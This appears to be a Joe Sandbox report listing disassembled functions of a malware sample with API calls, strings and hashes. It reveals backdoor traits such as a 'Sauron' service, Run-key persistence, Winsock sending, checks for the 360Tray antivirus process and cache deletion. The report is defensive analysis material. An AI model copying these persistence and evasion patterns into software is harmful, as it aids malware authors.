Instruction ID: d219674f8fb3a7f6364995e1678cb9643b7b19d26cdc1b51fcba0389e2ede964
Opcode Fuzzy Hash: 6a379c535cee0a83972a96eefa16e2815315408d36ecad51e2145a20d6777031
Instruction Fuzzy Hash: 443145B2900218EBEB14CBA0DC49BDD7778FF48702F108599F609A6191DB759689CF51

Function 10023966 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 174windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10024068: GetWindowLongA.USER32(?,000000F0), ref: 10024074

GetParent.USER32(?), ref: 10023991
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 100239B4
GetWindowRect.USER32(?,?), ref: 100239CD
GetWindowLongA.USER32(00000000,000000F0), ref: 100239E0
CopyRect.USER32(?,?), ref: 10023A2D
CopyRect.USER32(?,?), ref: 10023A37
GetWindowRect.USER32(00000000,?), ref: 10023A40
CopyRect.USER32(?,?), ref: 10023A5C

Strings

@, xrefs: 100239CF
(, xrefs: 100239F8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: ($@
API String ID: 808654186-1311469180
Opcode ID: 262f075bb39d521e6244a48491d9cd74d4dd8680871d18f16c70de4f876f904a
Instruction ID: 09c70edec585a58ab012375333adb9a44dd4b538b1c5c7ab22f271f3eeac7209
Opcode Fuzzy Hash: 262f075bb39d521e6244a48491d9cd74d4dd8680871d18f16c70de4f876f904a
Instruction Fuzzy Hash: C3517172A00219AFDB11DBA8DC85FEEBBBDEF48250F558125E905F7280D770ED458B60

Function 100089FA Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?,?,?,?,?,?), ref: 10008A60

Strings

"%1, xrefs: 10008B39
D, xrefs: 10008BCE
%s\shell\open\command, xrefs: 10008AB5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Open
String ID: "%1$%s\shell\open\command$D
API String ID: 71445658-1634606264
Opcode ID: 18c03e7d7776fa7f6f84e7e9af7d02898d092a7435e282ce147c0c299eac803a
Instruction ID: c6e042778d419a703b28b0711e93f49bd108c2a861124b3a7d0fcb7cbcf3fdbf
Opcode Fuzzy Hash: 18c03e7d7776fa7f6f84e7e9af7d02898d092a7435e282ce147c0c299eac803a
Instruction Fuzzy Hash: EB5160B5900218EBEB25CB90CC89FFAB77CFB44745F144598F609A6190DB749B88CFA1

Function 100100E3 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 127libraryloadersleepCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ws2_32.dll), ref: 100100F8
GetProcAddress.KERNEL32(?,closesocket), ref: 1001010A
wsprintfA.USER32 ref: 1001013E
CloseHandle.KERNEL32(00000000), ref: 100101A6
Sleep.KERNEL32(00000002), ref: 100101B7
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 10010235
GetProcAddress.KERNEL32(?,send), ref: 1001024D
GetLastError.KERNEL32 ref: 10010295
FreeLibrary.KERNEL32(00000000), ref: 100102E5

Strings

closesocket, xrefs: 10010101
ws2_32.dll, xrefs: 10010230
ws2_32.dll, xrefs: 100100F3
ID= %d , xrefs: 10010132
send, xrefs: 10010241

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$CloseErrorFreeHandleLastSleepwsprintf
String ID: ID= %d $closesocket$send$ws2_32.dll$ws2_32.dll
API String ID: 872202526-1926390827
Opcode ID: c4b70f023c0e7a700941efb2d422de8302fe62dd9ed6e323eaf526139dc85c34
Instruction ID: 8f16a626eb491cdace3d0d0b51c911ff7ce400d4f3f606ff62c79f1c6f21f89a
Opcode Fuzzy Hash: c4b70f023c0e7a700941efb2d422de8302fe62dd9ed6e323eaf526139dc85c34
Instruction Fuzzy Hash: 1051D674A00228EFEB60CB64CC98B99BBB5FB45304F1081D9E58DAB251CB719EC9CF51

Function 1001C97A Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,1001CAB3), ref: 1001C99C
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1001C9B4
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1001C9C5
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1001C9D6
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1001C9E7
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1001C9F8
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1001CA09

Strings

MonitorFromPoint, xrefs: 1001C9E1
USER32, xrefs: 1001C997
EnumDisplayMonitors, xrefs: 1001C9F2
MonitorFromWindow, xrefs: 1001C9BF
MonitorFromRect, xrefs: 1001C9D0
GetMonitorInfoA, xrefs: 1001CA03
GetSystemMetrics, xrefs: 1001C9AE

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2376520503
Opcode ID: d42525f7401d9860048767b07128b222c63b0f3217fdf25940c509450c5d55d6
Instruction ID: e818cef8fe276f3f7864f3250133a03461a873b15a503aa7ee017624e74afeab
Opcode Fuzzy Hash: d42525f7401d9860048767b07128b222c63b0f3217fdf25940c509450c5d55d6
Instruction Fuzzy Hash: 2911947591123C9AEB42CF259CC496DBAE4F70E694BD4083EE204E6150D738C5C1EB21

Function 10008390 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 81stringtimeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 100083AA
strlen.MSVCRT ref: 100083CB

Part of subcall function 1001138A: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100113B9
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCreateKeyExA), ref: 100113CB
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegSetValueExA), ref: 100113DD
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteKeyA), ref: 100113EF
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegDeleteValueA), ref: 10011401
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 10011413
Part of subcall function 1001138A: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 10011425

strlen.MSVCRT ref: 100083FC
GetLocalTime.KERNEL32(?), ref: 1000842D
wsprintfA.USER32 ref: 1000847C
strlen.MSVCRT ref: 1000848B

Strings

%4d-%.2d-%.2d %.2d:%.2d, xrefs: 10008473
Remarkbeizhu, xrefs: 100083DC
InstallTime, xrefs: 1000849B
Default, xrefs: 100083F7, 10008406
Groupfenzhu, xrefs: 1000840D
Sauron, xrefs: 10008399
SOFTWARE\%s, xrefs: 1000839E

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressProc$strlen$wsprintf$LibraryLoadLocalTime
String ID: %4d-%.2d-%.2d %.2d:%.2d$Default$Groupfenzhu$InstallTime$Remarkbeizhu$SOFTWARE\%s$Sauron
API String ID: 1774077780-3229278884
Opcode ID: 9079a7c4665ae84088f0a83a9265736d60d094df14b7f0a7c7851fc0ef2aa928
Instruction ID: 162111ce566583944956307c1d60a186ce6ffd3502473aadba1d0104caa5447c
Opcode Fuzzy Hash: 9079a7c4665ae84088f0a83a9265736d60d094df14b7f0a7c7851fc0ef2aa928
Instruction Fuzzy Hash: 6321C4B19101196BEB10E794CC46FFA7338EF44704F1401B5FA09F5186EB71BA648AA9

Function 100086E7 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 70sleepregistryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32(Sauron,1000883F), ref: 100086FA
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 1000874C
Sleep.KERNEL32(000001F4), ref: 10008761
GetVersionExA.KERNEL32(00000094), ref: 10008778
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 1000879D

Part of subcall function 100084E6: CreateMutexA.KERNEL32(00000000,00000000,LJPXYXC,?,1000B805), ref: 100084F5
Part of subcall function 100084E6: GetLastError.KERNEL32(?,1000B805), ref: 100084FE
Part of subcall function 100084E6: CloseHandle.KERNEL32(?,?,1000B805), ref: 1000850F

Sleep.KERNEL32(0000003C), ref: 100087B3
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100087D5
wsprintfA.USER32 ref: 100087EE
CloseHandle.KERNEL32(00000000), ref: 10008813
SetServiceStatus.ADVAPI32(00000000,10054DF8), ref: 1000882E

Strings

%s Win7, xrefs: 100087E2
Sauron, xrefs: 100086F5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Service$Status$CloseHandleSleep$CreateCtrlErrorFileHandlerLastModuleMutexNameRegisterVersionwsprintf
String ID: %s Win7$Sauron
API String ID: 3700413852-3068964099
Opcode ID: a88d738b640b1b0b8773e14b794e2790c8e84197e4cf6611d2e6dc73121e6937
Instruction ID: c7f07273d00b04acc3e8bcc7852a90c1f2634f8a492b9e48dd8d66ae8b922e67
Opcode Fuzzy Hash: a88d738b640b1b0b8773e14b794e2790c8e84197e4cf6611d2e6dc73121e6937
Instruction Fuzzy Hash: 583129B0A00225EBF720DF60CD8DBD93BB4FB04349F528089F61E96295DBB45649CFA1

Function 10009120 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 1000283E: RegOpenKeyExA.ADVAPI32(00000001,?,00000000,00020019,?), ref: 10002862

FindWindowA.USER32(00000000,1004E4F4), ref: 10009178
FindWindowA.USER32(00000000,1004E508), ref: 1000918E
GetWindowRect.USER32(?,?), ref: 1000919F
GetSystemMetrics.USER32(00000010), ref: 100091A7
GetSystemMetrics.USER32(00000011), ref: 100091BF
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 100091E5
SetWindowPos.USER32(?,000000FF,?,?,00000001,00000001,00000005), ref: 100091FF
Sleep.KERNEL32(000003E8), ref: 1000920A

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10009138
XXX3XXX, xrefs: 10009133
C:\xxxx.inst.ini, xrefs: 1000915A

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$FindMetricsSystem$OpenRectSleep
String ID: C:\xxxx.inst.ini$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$XXX3XXX
API String ID: 3080869463-1979558934
Opcode ID: 7011de20324e345889959e928e859923beaeff032b5f6078a4322fbd8c67f3d0
Instruction ID: 28d8e679d66695927220b36c2cf004cc5392433a5191b3b02ab9e4b694744154
Opcode Fuzzy Hash: 7011de20324e345889959e928e859923beaeff032b5f6078a4322fbd8c67f3d0
Instruction Fuzzy Hash: 8621B571A44205BBFB10EBF8CC49FAD7B74FB44711F208224FA19A61C4DB70A5418B55

Function 1000499E Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 63sleepfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 100049B5
wsprintfA.USER32 ref: 100049D8
GetFileAttributesA.KERNEL32(?), ref: 100049E8
wsprintfA.USER32 ref: 10004A11
Sleep.KERNEL32(00000064), ref: 10004A1C
CopyFileA.KERNEL32(?,?,00000000), ref: 10004A32
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 10004A43
CreateDirectoryA.KERNEL32(?,00000000), ref: 10004A52
SetFileAttributesA.KERNEL32(?,00000000), ref: 10004A78

Strings

%s\%s, xrefs: 100049CC
%s\%s, xrefs: 10004A05

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$wsprintf$Attributes$CopyCreateDirectoryMoveSleep
String ID: %s\%s$%s\%s
API String ID: 1649401861-3515709335
Opcode ID: 6712a372e496c8c1e9a1ba200f4191699bacf8b39758f4f9f727c1a345851653
Instruction ID: 9c654473f625db842562fb79907c71f505d649758e5e0abd6f60c4adc29fb3e4
Opcode Fuzzy Hash: 6712a372e496c8c1e9a1ba200f4191699bacf8b39758f4f9f727c1a345851653
Instruction Fuzzy Hash: 742162B6810228ABE711DBA4CC89FEA777CFB04300F5446C9F20992061EB715785CF61

Function 004321E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00439458,0000000C,00432320,00000000,00000000,?,0043174F,00000003,?,?,?,?,?,?,004310F6), ref: 004321F7
__crt_waiting_on_module_handle.LIBCMT ref: 00432202

Part of subcall function 004313E1: Sleep.KERNEL32(000003E8,00000000,?,00432148,KERNEL32.DLL,?,00432194,?,0043174F,00000003), ref: 004313ED
Part of subcall function 004313E1: GetModuleHandleW.KERNEL32(?,?,00432148,KERNEL32.DLL,?,00432194,?,0043174F,00000003,?,?,?,?,?,?,004310F6), ref: 004313F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043223B
__lock.LIBCMT ref: 0043225D
InterlockedIncrement.KERNEL32(0043A4D8), ref: 0043226A
__lock.LIBCMT ref: 0043227E
___addlocaleref.LIBCMT ref: 0043229C

Strings

KERNEL32.DLL, xrefs: 004321F1, 004321F6, 00432201
EncodePointer, xrefs: 0043221F
DecodePointer, xrefs: 00432233

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 3fd7c86ec16fa806e2ff4f6576f177b098c7976fd75de1b41a74bffd7e0df7a6
Instruction ID: cf6b6caca1a981fd2b130243b2a3bed02026b4869638f3321860a4a3ac9c4ca5
Opcode Fuzzy Hash: 3fd7c86ec16fa806e2ff4f6576f177b098c7976fd75de1b41a74bffd7e0df7a6
Instruction Fuzzy Hash: 4E119071940701AFD720AF76DD45B4BFBE0AF18314F20655FF499932A1CBB89A448B2D

Function 10002CAD Relevance: 16.7, APIs: 5, Strings: 6, Instructions: 198sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 10002301: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10002318
Part of subcall function 10002301: Process32First.KERNEL32(?,00000128), ref: 10002335

Sleep.KERNEL32(0000000A), ref: 10002D46
Sleep.KERNEL32(0000000A), ref: 10002DCD

Part of subcall function 100107B2: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1000814B,00000000,00000000,00000000), ref: 100107D3
Part of subcall function 100107B2: WaitForSingleObject.KERNEL32(?,000000FF), ref: 10010806
Part of subcall function 100107B2: CloseHandle.KERNEL32(?), ref: 10010810

Sleep.KERNEL32(0000000A), ref: 10002E71
Sleep.KERNEL32(0000000A), ref: 10002EF8

Part of subcall function 100122A7: GetFileAttributesA.KERNEL32(00000000,1000B307,c:\xxxx.ini,00000000), ref: 100122AB
Part of subcall function 100122A7: GetLastError.KERNEL32 ref: 100122B6

Sleep.KERNEL32(0000000A), ref: 10002F70

Strings

360Tray.exe, xrefs: 10002CAD
iiiiiiiiiiii.exe, xrefs: 10002D4C
c:\xxxx.ini, xrefs: 10002CC4
c:\xxxx.ini, xrefs: 10002DEF
iiiiiiiiii.exe, xrefs: 10002E77
360tray.exe, xrefs: 10002DD8

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Sleep$Create$AttributesCloseErrorEventFileFirstHandleLastObjectProcess32SingleSnapshotToolhelp32Wait
String ID: 360Tray.exe$360tray.exe$c:\xxxx.ini$c:\xxxx.ini$iiiiiiiiii.exe$iiiiiiiiiiii.exe
API String ID: 155909606-3343538348
Opcode ID: 9102fabe410437112acff8eb61bdf675324718a4d1c2afaebc367713ab91ad2e
Instruction ID: 5853cc409bb53c8e4a50c00f9b534d07d864d2a79b60f80fb53420379cf69e29
Opcode Fuzzy Hash: 9102fabe410437112acff8eb61bdf675324718a4d1c2afaebc367713ab91ad2e
Instruction Fuzzy Hash: AB711E74B802027BF224DA14CC42F9A7771EB54740F2481A5FA496F7C6EAB1BE818F56

Function 100053CE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197COMMON

Download Yara Rule

Strings

%s\shell\open\command, xrefs: 10005510
D, xrefs: 10005635
"%1, xrefs: 100055A0

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID:
String ID: "%1$%s\shell\open\command$D
API String ID: 0-1634606264
Opcode ID: b6a67e54d87d11fec93af45cdbd044c7198a354a3ac3341bffe2d94218de5ab5
Instruction ID: d3e039546d9bb8d8a406d9b135c74785703725127183dc1cda93d242c30d443d
Opcode Fuzzy Hash: b6a67e54d87d11fec93af45cdbd044c7198a354a3ac3341bffe2d94218de5ab5
Instruction Fuzzy Hash: D971A5B5D00618ABEB20CB94CC45BEF7778EB44346F504598E608BB181EB766BC5CFA1

Function 100098C8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

FindFirstUrlCacheEntryA.WININET(00000000,00000000,00000000), ref: 100098F9
GetLastError.KERNEL32 ref: 100098FF
FindFirstUrlCacheEntryA.WININET(00000000,?,00000000), ref: 1000993A
DeleteUrlCacheEntry.WININET(00000000), ref: 1000994A
FindNextUrlCacheEntryA.WININET(?,?,00000000), ref: 1000996D
DeleteUrlCacheEntry.WININET(00000000), ref: 1000997E
GetLastError.KERNEL32 ref: 10009986
FindCloseUrlCache.WININET(?), ref: 100099D6

Strings

z, xrefs: 1000998F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Cache$Entry$Find$DeleteErrorFirstLast$CloseNext
String ID: z
API String ID: 2707622274-1657960367
Opcode ID: e9725279d80ff65078c9f77a68c9dbd7889f875e13556f2c9287368dab25f590
Instruction ID: 4f15ed37b455fcf422e6ce6226d1fcd5f9bac70ec99976ae97761bb4f276e436
Opcode Fuzzy Hash: e9725279d80ff65078c9f77a68c9dbd7889f875e13556f2c9287368dab25f590
Instruction Fuzzy Hash: F84117B5D00219DFEB14DFD8C985BEEBBB8FB48350F204629E509B7254D735A901CBA1

Function 10021F2C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10021F31
GetPropA.USER32(?,AfxOldWndProc423), ref: 10021F49
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 10021FA7

Part of subcall function 10021B14: GetWindowRect.USER32(?,?), ref: 10021B39
Part of subcall function 10021B14: GetWindow.USER32(?,00000004), ref: 10021B56

SetWindowLongA.USER32(?,000000FC,?), ref: 10021FD7
RemovePropA.USER32(?,AfxOldWndProc423), ref: 10021FDF
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 10021FE6
GlobalDeleteAtom.KERNEL32(00000000), ref: 10021FED

Part of subcall function 10021AF1: GetWindowRect.USER32(?,?), ref: 10021AFD

CallWindowProcA.USER32(?,?,?,?,00000000), ref: 10022041

Strings

AfxOldWndProc423, xrefs: 10021F3F, 10021F47, 10021FDD, 10021FE5

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
